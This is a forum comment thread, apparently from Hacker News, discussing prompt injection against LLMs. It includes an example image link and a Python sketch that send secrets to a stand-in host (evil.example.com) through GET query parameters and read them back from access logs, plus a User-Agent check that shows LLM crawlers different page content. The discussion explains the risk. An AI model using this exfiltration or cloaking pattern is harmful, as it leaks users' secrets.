Comment by quuxplusone

3 days ago

Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure.

Yes, even a GET request can change the state of the external world, even if that's, strictly speaking, against the spec (HTTP defines GET as a "safe" method).

  • Wasn't there an HN post where someone made their website look different to LLMs or web scrapers than to a typical user? I can't seem to find the post, but that could add an extra layer (I mean, it's all different if you're viewing from a browser vs. curl)

  • Yes, and GET requests with the sensitive data as query parameters are often used to exfiltrate data. The attacker doesn't even need to set up a special handler, as long as they can read the access logs.
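A minimal sketch of the exfiltration pattern described above, using only the standard library (the domain, path, and "secret" are hypothetical): the payload rides in the query string of an ordinary GET, so a stock web server's access log records it verbatim and no custom handler is required.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Hypothetical sensitive data the injected prompt tricked the client into leaking.
secret = "api_key=sk-123"

# The attacker only needs the victim's client to issue this GET (e.g. via an
# img src); the data travels URL-encoded in the query string.
url = "https://evil.example.com/exfiltrate.jpg?data=" + quote(secret)

# Server side, a default access log already contains the full request line:
#   GET /exfiltrate.jpg?data=api_key%3Dsk-123 HTTP/1.1
# so the attacker recovers the payload just by parsing the log.
recovered = parse_qs(urlsplit(url).query)["data"][0]
print(recovered)  # the original secret, byte for byte
```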
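Re: showing scrapers a different page — one common (and trivially spoofable) way to do it is keying on the User-Agent header. A hypothetical sketch; the bot-name list and return strings are illustrative, not from any real site:

```python
def pick_body(user_agent: str) -> str:
    """Return different page content for scrapers/LLM crawlers vs. browsers.

    Keyed purely on User-Agent, which any client can forge; this is a
    cat-and-mouse layer, not a security boundary.
    """
    ua = user_agent.lower()
    # Illustrative markers: curl, common HTTP libraries, and a known LLM crawler.
    if any(marker in ua for marker in ("curl", "python-requests", "gptbot")):
        return "content shown to scrapers"
    return "content shown to browsers"
```

So curl and a typical browser would literally receive different documents, which is why the page "is all different" depending on how you fetch it.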

Once again affirming that prompt injection is social engineering for LLMs. To a first approximation, humans and LLMs have the same failure modes, and at the system design level they belong to the same class. I.e., LLMs are little people on a chip; don't put one where you wouldn't put the other.

  • They are worse than people: LLMs combine toddler-level critical thinking with intern-level technical skills, and read much, much faster than any person can.

    • Right. But my point is, they belong to the bucket labeled "people", not the one labeled "software", for the purposes of system design.